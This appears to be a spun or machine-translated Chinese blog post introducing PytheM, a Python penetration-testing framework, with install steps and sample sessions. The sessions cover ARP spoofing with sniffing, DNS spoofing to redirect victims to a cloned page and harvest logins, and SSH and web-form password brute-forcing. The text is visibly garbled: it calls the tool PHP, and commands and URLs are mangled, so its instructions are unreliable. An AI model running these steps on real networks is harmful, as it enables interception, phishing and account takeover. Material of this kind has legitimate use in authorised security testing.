Python渗透测试框架:PytheM
"PytheM是1个PHP渗透测试架构。它只有在osnGNU/Linux Os系统软件上运作。
安裝
$sudo apt-set update
$sudo apt-set install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libnetfilter-queue-dev libespeak1 libffi-dev libssl-dev
$sudo git clone https://github.Com/m4n3dw0lf/PytheM/ $Cd PytheM
$sudo pip install -r requirements.txt
运作
$sudo ./pythem
事例
ARP蒙骗-.com中间人攻击
指令:
pythem> get interface [+] Enter the interface: wlan0 pythem> get gateway [+] Enter the gateway: 192.168.1.1 pythem> arpspoof start [+] Setting the packet forwarding. [+] Iptables redefined. [+] ARP spoofing initialized. pythem> sniff [+] Enter the filter: .com
ARP+DNS蒙骗-重定向到仿冒的网页页面,搜集登陆凭据
应用get等复制专用工具复制你选定的网址,并布署在Apache2上
指令:
pythem> get target [+] Enter the target(s): 192.168.0.8 pythem> get interface wlan0 pythem> get gateway 192.168.0.1 pythem> arpspoof start [+] Setting the packet forwarding. [+] Iptables redefined. [+] ARP spoofing initialized. pythem> dnsspoof start [+] Domain To whi spoofed: WWW.google.Com [+] iP address To whi redirected: 192.168.0.6 [+] DNS spoofing initialized. pythem> sniff dns
SSH暴破-暴力破解
pythem> service ssh start pythem> get target [+] Enter the target(s): 127.0.0.1 pythem> get file wordlist.txt pythem> brute-force ssh [+] Enter the username To bruteforce: anon123
web网页页面主要参数暴力破解
最先获得web网页页面登陆时的主要参数文件格式Id= value
显示信息重定向网页页面,要是定项到1个不一样的网页页面则表明猜解恰当。
指令
pythem> get target .com://127.0.0.1/ pythem> get file
[+] Enter the path To the file: wordlist.txt
pythem> brute-force webform
[+] Brute-Form authentication initialized.
[+] Enter the input Id of the username box: vSIS_Id
[+] Enter the input Id of the password box: vSIS_PASS
[+] Enter the username To brute-force the formulary: root
网页地址內容工程爆破
pythem> get target
[+] Enter the target(s): .com://testphp.vulnweb.Com/index.Python?Id= pythem> get file 1to100.txt
pythem> brute-force 网页地址
[+] Content 网页地址 bruter initialized.
作用
[ PytheM – Penetration Testing Framework v0.3.2 ]
help:
复印协助信息内容。
相关文章
- 2条评论
- 怎忘俗欲2022-05-28 00:34:15
- 时的主要参数文件格式Id= value显示信息重定向网页页面,要是定项到1个不一样的网页页面则表明猜解恰当。指令pythem> get target .co
- 寻妄忿咬2022-05-28 10:26:03
- ythem> dnsspoof start [+] Domain To whi spoofed: WWW.google.Com [+] iP address To whi redirected: 192.168.0.6 [+] DNS spoofing initializ